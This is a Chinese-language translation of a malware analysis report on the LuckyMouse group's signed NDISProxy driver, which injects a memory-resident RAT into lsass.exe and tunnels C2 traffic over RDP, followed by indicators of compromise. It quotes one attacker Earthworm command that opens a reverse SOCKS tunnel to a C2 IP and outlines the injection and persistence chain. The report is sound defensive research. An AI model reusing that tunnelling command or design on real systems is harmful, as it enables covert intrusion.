LuckyMouse使用中國IT公司的證書籤署惡意NDISProxy驅動程序

一、前言

自2018年3月以來，我們發現了幾例感染，在這些感染中未知的特洛伊木馬被注入lsass.exe系統進程內存。這些植入程序由擁有合法數字簽名的32位和64位網路過濾驅動程序NDISProxy注入。有趣的是，這個驅動程序是使用屬於中國的公司LeagSoft的數字證書籤署的，LeagSoft是一家位於廣東深圳的信息安全軟體開發商。我們通過CN-CERT向公司通報了這個問題。

本報告中描述的活動在中亞高層會議召開之前就已經開始，我們認為幕後的行動者仍然關注地區政治。

二、惡意模塊

惡意軟體包含三個不同的模塊：

·自定義C ++安裝程序解密並釋放驅動程序文件至相應的系統目錄，為驅動程序持久性創建Windows自動運行服務，並將加密的內存中特洛伊木馬添加到系統註冊表中。

·網路過濾驅動程序（NDISProxy），用於解密並將特洛伊木馬注入內存並過濾埠3389（遠程桌面協議，RDP）流量，以便將特洛伊木馬的C2通信插入其中。

·最後階段的C ++特洛伊木馬作為HTTPS伺服器，與驅動程序一起工作。通過埠3389和443兩個可能的通信信道被動地等待來自其C2的通信。

安裝程序設置完所有模塊後，NDISProxy驅動程序和RAT一起工作

這些模塊允許攻擊者在受感染的基礎架構中靜默橫向移動，但如果新的受感染主機僅具有LAN IP，則不允許它們與外部C2通信。因此，運營商使用Earthworm SOCKS隧道將受感染主機的LAN連接到外部C2。他們還使用Scanline網路掃描程序查找文件共享（埠135，伺服器消息塊，SMB），用於通過管理員密碼傳播惡意軟體，並記錄鍵盤操作。

三、傳播

到2018年3月底，我們在不同的目標中檢測到了用於此活動的32位dropper的分布情況。但是，我們沒有觀察到任何魚叉式網路釣魚或水坑活動。我們認為運營商通過已經受到控制的網路傳播他們的感染程序。

四、工作原理

1．自定義安裝程序

初始感染程序是32位可移植可執行文件，能夠根據目標安裝32位或64位驅動程序。安裝程序會在同一目錄中的load.log文件中記錄所有安裝過程步驟。它檢查操作系統是否為Windows Vista或更高版本（主要版本等於或大於6），並使用DES（數據加密標準）演算法解密其初始配置。

配置中的一組眾所周知的埠號（HTTP，HTTPS，SMB，POP3S，MSSQL，PPTP和RDP）並沒有使用，這與消息中的「[test]」字元串一起表明此惡意軟體仍處於開發階段。

安裝程序創建信號量（名稱取決於配置）GlobalDoor-ndisproxy-mn並檢查服務（名稱還取決於配置）是否已安裝ndisproxy-mn。如果是，則dropper在load.log中寫入「檢測到door」。運行NDISProxy的自動運行Windows服務是開發人員術語中的「door」。

安裝程序還解密（使用相同的DES）最後一個階段特洛伊木馬的shellcode，並將其保存HKLMSOFTWAREClasses32ndisproxy-mn（或64ndisproxy-mn適應於64位主機）下的三個註冊表值中，名為xxx0，xxx1，xxx2。加密配置保存在註冊表項HKCR
disproxy-mn下的值filterpd-ndisproxy-mn。

初始安裝程序在系統註冊表中保存XOR加密的特洛伊木馬程序的shellcode和DES加密配置

安裝程序會創建相應的自動啟動服務和註冊表項。「Altitude」註冊表值（minifilter驅動程序的唯一ID）設置為321 000，表示Windows中的FSFilter Anti-Virus：

2．NDISProxy網路過濾驅動

這個數字簽名的驅動程序是此活動中使用的最有趣的程序。網路過濾模塊有兩個目的：首先解密並注入RAT;第二，通過RDP埠3389設置其通信信道。

該驅動程序使用VeriSign向LeagSoft頒發的數字證書進行簽名，LeagSoft是一家開發數據丟失防護（DLP）解決方案等信息安全軟體的公司。

該驅動程序廣泛使用第三方公開可用的C源代碼，包括GitHub上提供的Blackbone存儲庫。

驅動程序再次檢查Windows版本是否高於Vista，然後創建名為\Device\ndisproxy-%s的設備（其中「 - 」之後的單詞各不相同，請參閱所有變體的附錄）及其對應的符號鏈接

\DosDevices\Global\ndisproxy-%s。

該驅動程序結合了HKLMSOFTWAREClasses32ndisproxy-mn中所有與木馬相關的註冊表值，並使用六位元組硬編碼值對它們進行XOR。然後，它使用Blackbone庫函數將生成的特洛伊木馬可執行shellcode注入lsass.exe內存。

NDISProxy用作網路流量過濾器引擎，過濾通過RDP埠3389的流量（埠號是硬編碼的）並向其中注入消息。

用戶模式內存中的特洛伊木馬與驅動程序之間的通信將通過DeviceIoControl Windows API函數編寫的自定義控制代碼。除輔助代碼外，還有兩個代碼值得一提：

3．內存C++ Trojan

請注意，此特洛伊木馬程序僅存在於內存中;上面的數據是針對解密的Windows註冊表內容而沒有包括初始shellcode

此RAT由NDISProxy驅動程序從系統註冊表解密並注入lsass.exe進程內存。代碼以shellcode開頭 - 而不是典型的Windows可移植可執行文件Loader，此惡意軟體本身實現了內存映射。

該特洛伊木馬是一個功能齊全的RAT，能夠執行命令執行和下載/上傳文件等常見任務。這是通過幾十個C ++類實現的，例如CMFile，CMFile，CMProcess，TFileDownload，TDrive，TProcessInfo，TSock等。第一階段自定義安裝程序使用相同的類。該木馬使用HTTP Server API在埠443上過濾HTTPS數據包並解析命令。

特洛伊木馬是一個HTTP伺服器，允許LAN連接。它使用SOCKS隧道器與C2通信

攻擊者使用此特洛伊木馬來收集目標數據，進行橫向移動並使用Earthworm隧道創建到其C2的SOCKS隧道。這個工具是公開的，在攻擊者中很受歡迎。鑒於特洛伊木馬本身就是一個HTTPS伺服器，我們認為SOCKS隧道用於沒有外網IP的目標，因此C2能夠發送命令。

五、幕後

我們發現此活動針對的是中亞政府。我們認為這次襲擊具有很強的針對性，與高級別會議有關。我們高度自信的認為LuckyMouse攻擊者使用本報告中描述的NDISProxy工具開展此次新攻擊行動。

特別是，Earthworm隧道的選擇對於攻擊者來說是典型的。此外，攻擊者使用的命令之一（「-s rssocks -d 103.75.190 [。] 28 -e 443」）創建到先前已知的LuckyMouse C2的隧道。此活動中受害者的選擇也與攻擊者所表現出的先前興趣一致。

六、契合當前趨勢

我們觀察到幾個攻擊活動逐漸轉向公開可用工具（如Metasploit或CobaltStrike）和自定義惡意軟體（如本報告中描述的最後階段C ++RAT）的組合。我們還觀察了不同的參與者如何定期從GitHub存儲庫中採用代碼。所有這些結合起來使歸因更加困難。

此活動再次證明了LuckyMouse對中亞的興趣以及關註上海合作組織的政治議程。

IoC

文件Hashes

Droppers-installers

9dc209f66da77858e362e624d0be86b3

dacedff98035f80711c61bc47e83b61d

Auxiliary Earthworm SOCKS隧道工具及Scanline

83c5ff660f2900677e537f9500579965

3a97d9b6f17754dcd38ca7fc89caab04

Domains and IPs

103.75.190[.]28

213.109.87[.]58

信號

GlobalDoor-ndisproxy-mn

GlobalDoor-ndisproxy-help

GlobalDoor-ndisproxy-notify

服務

ndisproxy-mn

ndisproxy-help

ndisproxy-notify

註冊表鍵值

HKLMSOFTWAREClasses32ndisproxy-mn

HKLMSOFTWAREClasses64ndisproxy-mn

HKCR
disproxy-mnfilterpd-ndisproxy-mn

HKLMSOFTWAREClasses32ndisproxy-help

HKLMSOFTWAREClasses64ndisproxy-help

HKCR
disproxy-mnfilterpd-ndisproxy-help

HKLMSOFTWAREClasses32ndisproxy-notify

HKLMSOFTWAREClasses64ndisproxy-notify

HKCR
disproxy-mnfilterpd-ndisproxy-notify

驅動的簽名證書

許多合法的LeagSoft產品都使用以下證書進行簽名。請不要將所有簽名文件視為惡意文件。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！